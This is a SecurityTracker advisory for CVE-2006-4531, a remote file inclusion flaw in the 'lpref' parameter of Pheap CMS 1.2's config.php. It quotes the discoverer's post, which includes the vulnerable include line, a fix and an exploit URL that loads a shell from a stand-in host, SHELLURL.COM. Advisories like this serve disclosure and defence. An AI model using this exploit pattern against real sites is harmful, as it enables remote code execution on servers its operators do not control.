SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Pheap Vendors:   barekoncept.com
Pheap Include File Bug in 'config.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016774
SecurityTracker URL:  http://securitytracker.com/id/1016774
CVE Reference:   CVE-2006-4531   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Aug 31 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.2
Description:   A vulnerability was reported in Pheap. A remote user can include and execute arbitrary code on the target system.

The 'config.php' script does not properly validate user-supplied input in the 'lpref' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/[Script Path]/pheap/lib/config.php?lpref=http://SHELLURL.COM?

SHiKaA discovered this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  pheap.barekoncept.com/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Pheap CMS<= (lpref) Remote File Inclusion Exploit

#==============================================================================================

#Pheap CMS<= (lpref) Remote File Inclusion Exploit

#===============================================================================================

#                                                                           

#Critical Level : Dangerous                                                 

#                                                                           

#Venedor site : http://pheap.barekoncept.com/           

#                                                                                                                             

#                                                              

#================================================================================================

#Bug in : pheap/lib/config.php

#

#Vlu Code :

#--------------------------------

#     <?

#

#      include($lpref."lib/globals.php");

#

#================================================================================================

#

#Solution : 

#        

# Insert in config.php    $lpref = "pheap"; 

# soory guys ... u willn't find any variable sites coz the scripts very new ;)

#

#Exploit :

#--------------------------------

#

#http://sitename.com/[Script Path]/pheap/lib/config.php?lpref=http://SHELLURL.COM?

#

#================================================================================================

#Discoverd By : SHiKaA

#

#Conatact : SHiKaA-[at]hotmail.com

#

#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior

==================================================================================================

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC